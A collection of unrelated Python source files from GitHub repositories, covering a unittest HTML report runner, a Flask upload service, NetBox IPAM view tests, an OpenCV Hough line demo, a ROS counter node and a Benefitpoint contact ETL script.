[]\n\n def wrapper(suite):\n for item in suite:\n if isinstance(item, unittest.TestCase):\n suites_list.append(suite)\n break\n else:\n wrapper(item)\n\n wrapper(self.suite)\n return suites_list\n\n def classification_test_case(self):\n \"\"\"\n Split the suite into individual test cases and store them in a list\n :return: list-->[case,case]\n \"\"\"\n test_list = []\n\n def wrapper(suite):\n for item in suite:\n if isinstance(item, unittest.TestCase):\n test_list.append(item)\n else:\n wrapper(item)\n\n wrapper(self.suite)\n return test_list\n\n def run(self, thread_count=1, exec_unit=\"class\"):\n \"\"\"\n Supports multithreaded execution\n Note: if several test classes share a global variable, errors may occur because of resource contention\n :param thread_count: number of threads, default 1\n :param exec_unit: case or class\n case: start threads per test case; the execution order of the cases is not guaranteed\n class: start threads per test class; the order of the cases inside a class is preserved\n :return:\n \"\"\"\n if exec_unit == \"case\":\n # split the test suite by test case\n suites = self.classification_test_case()\n else:\n # split the test suite by test class\n suites = self.classification_suite()\n\n with ThreadPoolExecutor(max_workers=thread_count) as ts:\n for i in suites:\n res = _TestResult()\n self.result.append(res)\n ts.submit(i.run, result=res).add_done_callback(res.stopTestRun)\n ts.shutdown(wait=True)\n self.get_reports()\n\n def rerun_run(self, count=0, interval=2):\n \"\"\"\n Rerun mechanism for failed or errored test cases\n :param count: number of reruns, default 0\n :param interval: seconds between reruns, default 2\n :return:\n \"\"\"\n res = _ReRunResult(count=count, interval=interval)\n self.result.append(res)\n suites = self.classification_test_case()\n for case in suites:\n case.run(res)\n res.stopTestRun()\n self.get_reports()\n
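 # Illustrative usage (editorial sketch, not part of the original file); the
 # discover() path below is hypothetical:
 #
 #     suite = unittest.defaultTestLoader.discover("./tests")
 #     runner = TestRunner(suite, filename="report.html", title="Test Report")
 #     runner.run(thread_count=4, exec_unit="class")  # one thread per test class
 #     # or: runner.rerun_run(count=2, interval=1)    # serial, retrying failures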
\n def get_reports(self):\n \"\"\"Generate the report\"\"\"\n print(\"All test cases have finished; generating the test report...\")\n # aggregate the test results\n test_result = {\n \"success\": 0,\n \"all\": 0,\n \"fail\": 0,\n \"skip\": 0,\n \"error\": 0,\n \"results\": [],\n \"testClass\": [],\n }\n # merge the results of every collector\n for res in self.result:\n for item in test_result:\n test_result[item] += res.fields[item]\n\n test_result['runtime'] = '{:.2f} S'.format(time.time() - self.starttime)\n test_result[\"begin_time\"] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(self.starttime))\n test_result[\"title\"] = self.title\n test_result[\"tester\"] = self.tester\n test_result['desc'] = self.desc\n if test_result['all'] != 0:\n test_result['pass_rate'] = '{:.2f}'.format(test_result['success'] / test_result['all'] * 100)\n else:\n test_result['pass_rate'] = 0\n\n # load the report template\n template_path = os.path.join(os.path.dirname(__file__), 'templates')\n env = Environment(loader=FileSystemLoader(template_path))\n if self.templates == 2:\n template = env.get_template('templates02.html')\n else:\n template = env.get_template('templates.html')\n file_path = os.path.join(self.report_dir, self.filename)\n # render the report template\n res = template.render(test_result)\n # write the report to a file\n with open(file_path, 'wb') as f:\n f.write(res.encode('utf8'))\n\n print(\"The test report has been generated; report path: {}\".format(file_path))\n\n\nif __name__ == '__main__':\n suite1 = unittest.defaultTestLoader.discover(r\"C:\\project\\musen\\case_test\")\n tr = TestRunner(suite1, title='Test Report', filename=\"musen\")\n tr.run()\n","repo_name":"tianya66/web_test","sub_path":"common/beautiful_report/HTMLReport.py","file_name":"HTMLReport.py","file_ext":"py","file_size_in_byte":13938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"74714365671","text":"letters = input(\"Please enter three letters separated by a space \\n\")\nletters = letters.split()\nwords = open(\"words.txt\", 'r')\nfout = open(\"letters.txt\", 'w')\n\nfor line in words:\n accept = 0\n word = line.strip()\n print(word)\n for letter in letters:\n if line.find(letter) != -1:\n accept += 1\n if accept == 3:\n fout.write(word + \"\\n\")\n accept = 0\nwords.close()\nfout.close()\n","repo_name":"MTLK-DCH/COM661","sub_path":"wk1_PythonAndWebProcessing_A1A2/A1.1_PythonTextProcessing/check_for_letters.py","file_name":"check_for_letters.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"22623439820","text":"from importlib import import_module\nfrom flask import Flask, render_template, Response, request, jsonify\nfrom flask_cors import CORS\nfrom werkzeug.utils import secure_filename\nimport pyaml\n\napp = Flask(__name__)\n\n#curl -i -X PUT -F name=Test -F data=@specs.epgz http://localhost:8080/upload_file\n@app.route('/upload_file', methods=['PUT','POST'])\ndef receive_file():\n file = request.files['data']\n print (file)\n if file:\n filename = secure_filename(file.filename)\n file.save(filename) \n #return (redirect(url_for('receive_file')))\n return jsonify({\"message\":\"move message received\"})\n\n@app.route('/', methods=['GET'])\ndef entry():\n return \"Hello World\"\n\ndef main():\n app.run(host='0.0.0.0', port=8080, threaded=True)\n\nif __name__ == '__main__':\n main()","repo_name":"mayoor/scratch_pad","sub_path":"main_service.py","file_name":"main_service.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"50517505","text":"import re\n\ntext = 'carol eats cats.'\nreg = re.compile(r'''\n (alice|bob|carol)\n \\s\n (eats|pets|throws)\n \\s\n (apples|cats|baseballs)\n .$\n\n''', re.I | re.VERBOSE)\n\nmo = reg.search(text)\nif mo is None:\n print('None')\nelse:\n 
print(mo.group(0))\n","repo_name":"Shinpei2/python_source","sub_path":"automation/chapter7/regax5.py","file_name":"regax5.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"13558352418","text":"#!/usr/bin/env python3\n\nimport os\nimport pathlib\nimport sys\nfrom typing import List\n\nfrom setuptools import setup\n\nSETUP_DIR = os.path.dirname(__file__)\nREADME = os.path.join(SETUP_DIR, \"README.rst\")\n\nexec(open(\"cwl_utils/__meta__.py\").read())\n\nneeds_pytest = {\"pytest\", \"test\", \"ptr\"}.intersection(sys.argv)\npytest_runner: List[str] = [\"pytest < 8\", \"pytest-runner\"] if needs_pytest else []\nsetup(\n name=\"cwl-utils\",\n version=__version__, # type: ignore # noqa: F821\n long_description=open(README).read(),\n long_description_content_type=\"text/x-rst\",\n author=\"Common workflow language working group\",\n author_email=\"common-workflow-language@googlegroups.com\",\n url=\"https://github.com/common-workflow-language/cwl-utils\",\n license=\"Apache 2.0\",\n python_requires=\">=3.8\",\n setup_requires=pytest_runner,\n packages=[\"cwl_utils\", \"cwl_utils.parser\", \"cwl_utils.tests\", \"cwl_utils.testdata\"],\n package_dir={\n \"cwl_utils.parser\": \"cwl_utils/parser\",\n \"cwl_utils.tests\": \"tests\",\n \"cwl_utils.testdata\": \"testdata\",\n },\n include_package_data=True,\n install_requires=open(\n os.path.join(pathlib.Path(__file__).parent, \"requirements.txt\")\n )\n .read()\n .splitlines(),\n tests_require=[\"pytest<8\", \"pytest-mock\"],\n test_suite=\"tests\",\n extras_require={\"pretty\": [\"cwlformat\"]},\n entry_points={\n \"console_scripts\": [\n \"cwl-cite-extract=cwl_utils.cite_extract:main\",\n \"cwl-docker-extract=cwl_utils.docker_extract:main\",\n \"cwl-expression-refactor=cwl_utils.expression_refactor:main\",\n \"cwl-graph-split=cwl_utils.graph_split:main\",\n \"cwl-normalizer=cwl_utils.normalizer:main\",\n ]\n },\n classifiers=[\n \"Environment :: Console\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: POSIX\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: 3.11\",\n \"Programming Language :: Python :: 3.12\",\n \"Typing :: Typed\",\n ],\n)\n","repo_name":"common-workflow-language/cwl-utils","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"72"}
{"seq_id":"42765667542","text":"# -*- coding:utf-8 -*-\nimport cv2 as cv\nimport numpy as np\nimport sys\n\n\ndef draw_line(img, lines):\n img_copy = img.copy()\n for i in range(0, len(lines)):\n rho, theta = lines[i][0][0], lines[i][0][1]\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a * rho\n y0 = b * rho\n x1 = int(x0 + 1000 * (-b))\n y1 = int(y0 + 1000 * a)\n x2 = int(x0 - 1000 * (-b))\n y2 = int(y0 - 1000 * a)\n cv.line(img_copy, (x1, y1), (x2, y2), (255, 255, 255), 2)\n return img_copy\n\n\nif __name__ == '__main__':\n # Read the image HoughLines.jpg\n image = cv.imread('./images/HoughLines.jpg')\n if image is None:\n print('Failed to read HoughLines.jpg.')\n sys.exit()\n cv.imshow('Origin', image)\n\n # Detect the image edges\n image_edge = cv.Canny(image, 50, 150, 3)\n cv.imshow('Image Edge', image_edge)\n\n # Detect lines with different accumulator thresholds and display the results
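 # Editorial note (not part of the original file): cv.HoughLines returns lines
 # in polar (rho, theta) form, and its fourth argument is the accumulator
 # threshold -- the minimum number of edge pixels that must vote for a line --
 # so the threshold=300 run below typically finds fewer lines than threshold=200.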
\n threshold_1 = 200\n lines_1 = cv.HoughLines(image_edge, 1, np.pi / 180, threshold_1)\n try:\n img1 = draw_line(image, lines_1)\n cv.imshow('Image HoughLines({})'.format(threshold_1), img1)\n except TypeError:\n print('No lines could be detected with the accumulator threshold set to {}.'.format(threshold_1))\n\n threshold_2 = 300\n lines_2 = cv.HoughLines(image_edge, 1, np.pi / 180, threshold_2)\n try:\n img2 = draw_line(image, lines_2)\n cv.imshow('Image HoughLines({})'.format(threshold_2), img2)\n except TypeError:\n print('No lines could be detected with the accumulator threshold set to {}.'.format(threshold_2))\n\n cv.waitKey(0)\n cv.destroyAllWindows()\n","repo_name":"fengzhenHIT/learnOpenCV4_Python","sub_path":"chapter7/HoughLines.py","file_name":"HoughLines.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"72"}
{"seq_id":"17067696824","text":"from netaddr import IPNetwork\nimport urllib.parse\n\nfrom django.test import Client, TestCase\nfrom django.urls import reverse\n\nfrom dcim.models import Device, DeviceRole, DeviceType, Manufacturer, Site\nfrom ipam.constants import IP_PROTOCOL_TCP\nfrom ipam.models import Aggregate, IPAddress, Prefix, RIR, Role, Service, VLAN, VLANGroup, VRF\nfrom utilities.testing import create_test_user\n\n\nclass VRFTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['ipam.view_vrf'])\n self.client = Client()\n self.client.force_login(user)\n\n VRF.objects.bulk_create([\n VRF(name='VRF 1', rd='65000:1'),\n VRF(name='VRF 2', rd='65000:2'),\n VRF(name='VRF 3', rd='65000:3'),\n ])\n\n def test_vrf_list(self):\n\n url = reverse('ipam:vrf_list')\n params = {\n \"q\": \"65000\",\n }\n\n response = self.client.get('{}?{}'.format(url, urllib.parse.urlencode(params)))\n self.assertEqual(response.status_code, 200)\n\n def test_configcontext(self):\n\n vrf = VRF.objects.first()\n response = self.client.get(vrf.get_absolute_url())\n self.assertEqual(response.status_code, 200)\n\n\nclass RIRTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['ipam.view_rir'])\n self.client = Client()\n self.client.force_login(user)\n\n RIR.objects.bulk_create([\n RIR(name='RIR 1', slug='rir-1'),\n RIR(name='RIR 2', slug='rir-2'),\n RIR(name='RIR 3', slug='rir-3'),\n ])\n\n def test_rir_list(self):\n\n url = reverse('ipam:rir_list')\n\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n\n\nclass AggregateTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['ipam.view_aggregate'])\n self.client = Client()\n self.client.force_login(user)\n\n rir = RIR(name='RIR 1', slug='rir-1')\n rir.save()\n\n Aggregate.objects.bulk_create([\n Aggregate(family=4, prefix=IPNetwork('10.1.0.0/16'), rir=rir),\n Aggregate(family=4, prefix=IPNetwork('10.2.0.0/16'), rir=rir),\n Aggregate(family=4, prefix=IPNetwork('10.3.0.0/16'), rir=rir),\n ])\n\n def test_aggregate_list(self):\n\n url = reverse('ipam:aggregate_list')\n params = {\n \"rir\": RIR.objects.first().slug,\n }\n\n response = self.client.get('{}?{}'.format(url, urllib.parse.urlencode(params)))\n self.assertEqual(response.status_code, 200)\n\n def test_aggregate(self):\n\n aggregate = Aggregate.objects.first()\n response = self.client.get(aggregate.get_absolute_url())\n self.assertEqual(response.status_code, 200)\n\n\nclass RoleTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['ipam.view_role'])\n self.client = Client()\n self.client.force_login(user)\n\n Role.objects.bulk_create([\n Role(name='Role 1', slug='role-1'),\n
Role(name='Role 2', slug='role-2'),\n Role(name='Role 3', slug='role-3'),\n ])\n\n def test_role_list(self):\n\n url = reverse('ipam:role_list')\n\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n\n\nclass PrefixTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['ipam.view_prefix'])\n self.client = Client()\n self.client.force_login(user)\n\n site = Site(name='Site 1', slug='site-1')\n site.save()\n\n Prefix.objects.bulk_create([\n Prefix(family=4, prefix=IPNetwork('10.1.0.0/16'), site=site),\n Prefix(family=4, prefix=IPNetwork('10.2.0.0/16'), site=site),\n Prefix(family=4, prefix=IPNetwork('10.3.0.0/16'), site=site),\n ])\n\n def test_prefix_list(self):\n\n url = reverse('ipam:prefix_list')\n params = {\n \"site\": Site.objects.first().slug,\n }\n\n response = self.client.get('{}?{}'.format(url, urllib.parse.urlencode(params)))\n self.assertEqual(response.status_code, 200)\n\n def test_prefix(self):\n\n prefix = Prefix.objects.first()\n response = self.client.get(prefix.get_absolute_url())\n self.assertEqual(response.status_code, 200)\n\n\nclass IPAddressTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['ipam.view_ipaddress'])\n self.client = Client()\n self.client.force_login(user)\n\n vrf = VRF(name='VRF 1', rd='65000:1')\n vrf.save()\n\n IPAddress.objects.bulk_create([\n IPAddress(family=4, address=IPNetwork('10.1.0.0/16'), vrf=vrf),\n IPAddress(family=4, address=IPNetwork('10.2.0.0/16'), vrf=vrf),\n IPAddress(family=4, address=IPNetwork('10.3.0.0/16'), vrf=vrf),\n ])\n\n def test_ipaddress_list(self):\n\n url = reverse('ipam:ipaddress_list')\n params = {\n \"vrf\": VRF.objects.first().rd,\n }\n\n response = self.client.get('{}?{}'.format(url, urllib.parse.urlencode(params)))\n self.assertEqual(response.status_code, 200)\n\n def test_ipaddress(self):\n\n ipaddress = IPAddress.objects.first()\n response = self.client.get(ipaddress.get_absolute_url())\n self.assertEqual(response.status_code, 200)\n\n\nclass VLANGroupTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['ipam.view_vlangroup'])\n self.client = Client()\n self.client.force_login(user)\n\n site = Site(name='Site 1', slug='site-1')\n site.save()\n\n VLANGroup.objects.bulk_create([\n VLANGroup(name='VLAN Group 1', slug='vlan-group-1', site=site),\n VLANGroup(name='VLAN Group 2', slug='vlan-group-2', site=site),\n VLANGroup(name='VLAN Group 3', slug='vlan-group-3', site=site),\n ])\n\n def test_vlangroup_list(self):\n\n url = reverse('ipam:vlangroup_list')\n params = {\n \"site\": Site.objects.first().slug,\n }\n\n response = self.client.get('{}?{}'.format(url, urllib.parse.urlencode(params)))\n self.assertEqual(response.status_code, 200)\n\n\nclass VLANTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['ipam.view_vlan'])\n self.client = Client()\n self.client.force_login(user)\n\n vlangroup = VLANGroup(name='VLAN Group 1', slug='vlan-group-1')\n vlangroup.save()\n\n VLAN.objects.bulk_create([\n VLAN(group=vlangroup, vid=101, name='VLAN101'),\n VLAN(group=vlangroup, vid=102, name='VLAN102'),\n VLAN(group=vlangroup, vid=103, name='VLAN103'),\n ])\n\n def test_vlan_list(self):\n\n url = reverse('ipam:vlan_list')\n params = {\n \"group\": VLANGroup.objects.first().slug,\n }\n\n response = self.client.get('{}?{}'.format(url, urllib.parse.urlencode(params)))\n self.assertEqual(response.status_code, 200)\n\n def test_vlan(self):\n\n vlan = VLAN.objects.first()\n response = 
self.client.get(vlan.get_absolute_url())\n self.assertEqual(response.status_code, 200)\n\n\nclass ServiceTestCase(TestCase):\n\n def setUp(self):\n user = create_test_user(permissions=['ipam.view_service'])\n self.client = Client()\n self.client.force_login(user)\n\n site = Site(name='Site 1', slug='site-1')\n site.save()\n\n manufacturer = Manufacturer(name='Manufacturer 1', slug='manufacturer-1')\n manufacturer.save()\n\n devicetype = DeviceType(manufacturer=manufacturer, model='Device Type 1')\n devicetype.save()\n\n devicerole = DeviceRole(name='Device Role 1', slug='device-role-1')\n devicerole.save()\n\n device = Device(name='Device 1', site=site, device_type=devicetype, device_role=devicerole)\n device.save()\n\n Service.objects.bulk_create([\n Service(device=device, name='Service 1', protocol=IP_PROTOCOL_TCP, port=101),\n Service(device=device, name='Service 2', protocol=IP_PROTOCOL_TCP, port=102),\n Service(device=device, name='Service 3', protocol=IP_PROTOCOL_TCP, port=103),\n ])\n\n def test_service_list(self):\n\n url = reverse('ipam:service_list')\n params = {\n \"device_id\": Device.objects.first(),\n }\n\n response = self.client.get('{}?{}'.format(url, urllib.parse.urlencode(params)))\n self.assertEqual(response.status_code, 200)\n\n def test_service(self):\n\n service = Service.objects.first()\n response = self.client.get(service.get_absolute_url())\n self.assertEqual(response.status_code, 200)\n","repo_name":"mtbutler07/netbox-heroku","sub_path":"netbox/ipam/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":8687,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"11126178063","text":"role = input(\"Enter your role in the project: \")\nage = input(\"Enter your age: \")\nage = int(age)\n\nif role == \"admin\" and age > 18:\n print(\"You have full permissions\")\nelif role == \"user\" and age > 16:\n print(\"You have some permissions on this project\")\nelse:\n print(\" this service is closed for quarantine\")\n\n\n","repo_name":"isakura313/third_22","sub_path":"logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"71852278633","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 23 09:50:13 2018\n\n@author: luk\n\"\"\"\n\n\"\"\"\ny'' = 4y\ny(0) = 1\ny(1) = 3\ny(t) = (3-e^(-2))*e^(2t)/(e^2-e^(-2)) + (e^2-3)*e^(-2t)/(e^2-e^(-2))\n\"\"\"\n\nimport numpy as np\nn = 99 # number of unknown interior points; with the two known boundary points, 101 points in total\nya = 1.0; yb = 3.0 # boundary values\nt0 = 0.0; t1 = 1.0 # computation interval\nh = (t1-t0) / (n+1) # step size\n\ntmpy = np.zeros( (n,1), dtype = np.float64 )\ny = np.zeros( (n+2,1), dtype = np.float64 ) # numerical solution\nx = np.zeros( (n+2,1), dtype = np.float64 )\nz = np.zeros( (n+2,1), dtype = np.float64 ) # analytical solution\n# build the coefficient matrix a\na = np.zeros( (n,n), dtype = np.float64 )\nfor i in range(n):\n a[i,i] = -4.0 * h * h - 2.0 # diagonal entries, depending only on h\n \n\nfor i in range(n-1):\n a[i,i+1] = 1.0\n a[i+1,i] = 1.0\n \n# build the right-hand side\nb = np.zeros( (n,1), dtype = np.float64 )\nb[0] = -1 # depends only on the boundary values: their negatives\nb[n-1] = -3
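# Editorial note (not part of the original file): the tridiagonal system built
# above is the central-difference discretization of y'' = 4y,
#     (y[i-1] - 2*y[i] + y[i+1]) / h**2 = 4*y[i],
# which rearranges to y[i-1] - (2 + 4*h**2)*y[i] + y[i+1] = 0 -- matching the
# diagonal a[i,i] = -4.0*h*h - 2.0 and the boundary terms b[0] = -ya, b[n-1] = -yb.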
\n\na = np.linalg.inv(a)\ntmpy = np.matmul(a,b)\ny[0] = ya; y[n+1] = yb\ny[1:n+1] = tmpy[:]\n\n# compute the analytical solution\nfor i in range(n+2):\n x[i] = t0 + np.float64(i) * h\n z[i] = ( (3.0-np.exp(-2.0)) * np.exp( 2.0*x[i] ) + ( np.exp(2.0)-3.0 )*np.exp(-2.0*x[i]) ) / ( np.exp(2.0) - np.exp(-2.0) )\n \n \n# plotting\nfrom matplotlib import pyplot as plt\nfig, axes = plt.subplots()\naxes.plot(x, y, 'r')\naxes.plot(x, z, 'b--')\n\nplt.title( \"LinBVPbyDF\" ) # set the figure title\nplt.xlabel(\"x\") # set the axis labels\nplt.ylabel(\"y\")\n\naxes.legend( [\"y\",\"z\"], loc = 9 ) # set the legend; loc = 9 places it at the top center\n\n# changing loc moves the legend; loc ranges over [0-10]\nplt.show()\n\n# error plot\nfig, axes = plt.subplots()\naxes.plot(x, abs(z-y)/z*100, 'b--')\n\nplt.title( \"Error\" ) # set the figure title\nplt.xlabel(\"x\") # set the axis labels\nplt.ylabel(\"error\")\n\nplt.show()\n\nprint( \"press Enter to stop!\" )\ninput()\n\n\n\n","repo_name":"chdlkl/DigitalComputation","sub_path":"chap7/LinBVPbyDF.py","file_name":"LinBVPbyDF.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"72695964393","text":"filename = \"alice_in_wonderland.txt\"\nfile = open(filename, encoding='utf8')\n\n#for line in file:\n#\tprint(line)\n\nraw = file.read()\n#print(raw[:65])\nprint(\"The length of Alice in Wonderland is \" + str(len(raw)))\nresult = []\nfrom string import ascii_lowercase\nfor letter in ascii_lowercase:\n\tcurrent_letter = 0\n\tcurrent = 0\n\twhile current < len(raw):\n\t\tif raw[int(current):int(current+1)].isalpha() and raw[int(current):int(current+1)].lower() == str(letter):\n\t\t\tcurrent_letter += 1\n\t\tcurrent += 1\n\tcurrent_list = [str(letter), str(current_letter)]\n\tresult.append(current_list)\n\tcurrent_letter = 0\nprint(result)","repo_name":"Grifsar/Summer-of-Code","sub_path":"python-weeks/wk2/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"34244320698","text":"#!/usr/bin/env python2 \n# -*- coding: utf-8 -*-\nimport rospy\nfrom std_msgs.msg import Int32\n\nvalue = 0\nthreshold = 0\n\ndef clock_callback(clock):\n global value\n global threshold\n\n value += 1\n if value == threshold:\n value_pub.publish(value)\n '''\n if value == threshold:\n rospy.loginfo(\"Clock: \" + str(clock) + \", Threshold: \" + str(value))\n value_pub.publish(value)\n else: \n rospy.loginfo(\"Clock: \" + str(clock) + \", Value: \" + str(value))\n '''\n\nif __name__ == '__main__':\n rospy.init_node(\"counter_node\")\n rospy.loginfo(\"Counter node has been started\")\n\n param_init = rospy.get_param('/counter_node/ros__parameters/init_value')\n value = param_init\n print(\"Initial Value: \" + str(value))\n\n param_threshold = rospy.get_param('/counter_node/ros__parameters/threshold')\n threshold = param_threshold\n print(\"Threshold: \" + str(threshold))\n\n sub = rospy.Subscriber(\"/ros_basics/clock\", Int32, callback=clock_callback)\n\n value_pub = rospy.Publisher(\"/ros_basics/value\", Int32, queue_size=10)\n\n rospy.spin()\n","repo_name":"MarekaGit/homework1_mobile_robots","sub_path":"catkin_ws/src/ros_basics/scripts/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"12370784757","text":"import re\nimport bpws\nimport mjdb\nimport config\nimport common as cmn\nimport pandas as pd\nimport datetime as dt\nfrom bs4 import BeautifulSoup as bs\nfrom sqlalchemy import create_engine\n\nLOGDIR = 'etl_benefitpoint'\nENGINE = create_engine(config.config('config.ini','postgres_alchemy')['url'])\nWSTSFMT = '%Y-%m-%dT%H:%M:%S.%f%z'\n\nlf = cmn.log_filer(LOGDIR,'account_contacts')\n\ndef modified_contacts(lastMod):\n updates = []\n if (dt.datetime.now(dt.timezone.utc) - lastMod).days <= 30:\n try:\n fc = bpws.find_changes(sinceLastModifiedOn=lastMod, 
typesToInclude='Account_Contact')\n except Exception as e:\n raise ValueError(f\"bpws.find_changes(sinceLastModifiedOn={lastMod}, typesToInclude='Account_Contact')\\n{e}\")\n else:\n try:\n for x in bs(fc.content, 'xml').find_all('modifications'):\n if dt.datetime.strptime(x.find('lastModifiedOn').text, WSTSFMT) > lastMod:\n updates.append(bs(bpws.get_account_contact(x.find('entityID').text).content,'xml').find('contact'))\n except Exception as e:\n raise ValueError(f\"unable to get findChanges: {e}\")\n else:\n try:\n for accountId in mjdb.bp_account_ids():\n for contact in bs(bpws.find_account_contacts(accountId),'xml').find_all('contacts'):\n if dt.datetime.strptime(contact.find('lastModifiedOn').text, WSTSFMT) > lastMod:\n updates.append(contact)\n except Exception as e:\n raise ValueError(f\"unable to get findAccountContacts: {e}\")\n return updates\n\ndef col_to_tag(col):\n c = col.split('_')\n return c[0] + ''.join(x.title() for x in c[1:])\n\ndef account_contact_row(accountID, contactID, soup):\n row = {'account_id':accountID, 'contact_id':contactID}\n for i in ('primary_location_id',):\n tag = col_to_tag(i)\n row[i] = int(soup.find(tag).text) if soup.find(tag) else None\n for t in ('title','additional_info','notes'):\n tag = col_to_tag(t)\n row[t] = soup.find(tag).text if soup.find(tag) else None\n for b in ('primary',):\n tag = col_to_tag(b)\n row[b] = bool(soup.find(tag).text) if soup.find(tag) else None\n for ts in ('last_modified_on',):\n tag = col_to_tag(ts)\n row[ts] = dt.datetime.strptime(soup.find(tag).text,WSTSFMT) if soup.find(tag) else None\n row['location_ids'] = ', '.join([x.text for x in soup.find_all('locationIDs')]) if soup.find('locationIDs') else None\n row['responsibilities'] = ', '.join([x.text for x in soup.find_all('responsibilities')]) if soup.find('responsibilities') else None\n return row\n\ndef contact_row(sourceKey, contactID, soup):\n row = {'contact_source':'ACCOUNT','source_key':sourceKey,'contact_id':contactID}\n for t in ('first_name','last_name','email'):\n tag = col_to_tag(t)\n row[t] = soup.find(tag).text if soup.find(tag) else None\n return row\n\ndef address_row(sourceKey, soup):\n row = {'address_source':'CONTACT', 'source_type':'ACCOUNT', 'source_key':sourceKey}\n for t in ('street_1','street_2','city','state','zip','country'):\n tag = col_to_tag(t)\n row[t] = soup.find(tag).text if soup.find(tag) else None\n return row\n\ndef phone_row(sourceKey, soup):\n row = {'phone_source':'CONTACT', 'source_type':'ACCOUNT', 'source_key':sourceKey}\n for t in ('area_code','number','type'):\n tag = col_to_tag(t)\n row[t] = soup.find(tag).text if soup.find(tag) else None\n return row\n\ndef custom_field_value_row(sourceKey, customFieldValueID, soup):\n row = {'cfv_source':'CONTACT', 'source_key':sourceKey, 'custom_field_value_id':customFieldValueID}\n for i in ('custom_field_id','option_value_ID'):\n tag = col_to_tag(i)\n row[i] = int(soup.find(tag).text) if soup.find(tag) else None\n row['value_text'] = soup.find('valueText').text if soup.find('valueText') else None\n return row \n\ndef main():\n \n accountContacts = []\n contacts = []\n addresses = []\n phones = []\n customFieldValues = []\n lastMod = mjdb.bp_last_modified('account_contact') if mjdb.bp_last_modified('account_contact') else dt.datetime(1900,1,1,0,0,0,tzinfo=dt.timezone.utc)\n # lastMod = dt.datetime(2022,9,15,0,0,tzinfo=dt.timezone.utc) ### DEBUG ONLY ###\n for contact in modified_contacts(lastMod):\n accountId = int(contact.find('accountID').text)\n contactId = 
int(contact.find('contact').find('contactID').text)\n try: \n accountContacts.append(account_contact_row(accountId, contactId, contact))\n except Exception as e:\n lf.error(f\"account_contact_row({accountId}, {contactId}, <>)\\n{e}\")\n try:\n contacts.append(contact_row(accountId, contactId, contact.find('contact')))\n except Exception as e:\n lf.error(f\"contact_row({contactId},<>)\\n{e}\")\n for address in contact.find_all('address'):\n if address.contents:\n try:\n addresses.append(address_row(contactId,address))\n except Exception as e:\n lf.error(f\"address_row(contactID,contact.find(<>))\\n{e}\")\n for p in contact.find_all('phones'):\n if not p.has_attr('xsi:nil'):\n try:\n phones.append(phone_row(contactId,p))\n except Exception as e:\n lf.error(f\"phone_row({contactId},<>)\\n{e}\")\n for cfv in contact.find_all('customFieldValues'):\n try:\n customFieldValueID = int(cfv.find('customFieldValueID').text)\n customFieldValues.append(custom_field_value_row(contactId, customFieldValueID, cfv))\n except Exception as e:\n lf.error(f\"custom_field_value_row({contactId}, {customFieldValueID}, <>)\\n{e}\")\n stages = {\n 'account_contact':accountContacts if accountContacts else None,\n 'contact':contacts if contacts else None,\n 'address':addresses if addresses else None,\n 'phone':phones if phones else None,\n 'custom_field_value':customFieldValues if customFieldValues else None\n }\n for s in stages:\n if stages[s]:\n try:\n rcs = pd.DataFrame(stages[s]).to_sql(f'stg_{s}', ENGINE, 'benefitpoint', 'replace', index=False, chunksize=10000, method='multi')\n except Exception as e:\n lf.error(f\"unable to stage records for {s}\")\n else:\n if rcs > 0:\n lf.info(f\"{rcs} record(s) staged for {s}\")\n try:\n rcu = mjdb.upsert_stage('benefitpoint', s, 'upsert')\n except Exception as e:\n lf.error(f\"mjdb.upsert_stage('benefitpoint', {s})\\n{e}\")\n else:\n lf.info(f\"mjdb.upsert_stage('benefitpoint', {s}) affected {rcu} record(s)\")\n finally:\n mjdb.drop_table('benefitpoint',f'stg_{s}')\n\nif __name__ == '__main__':\n 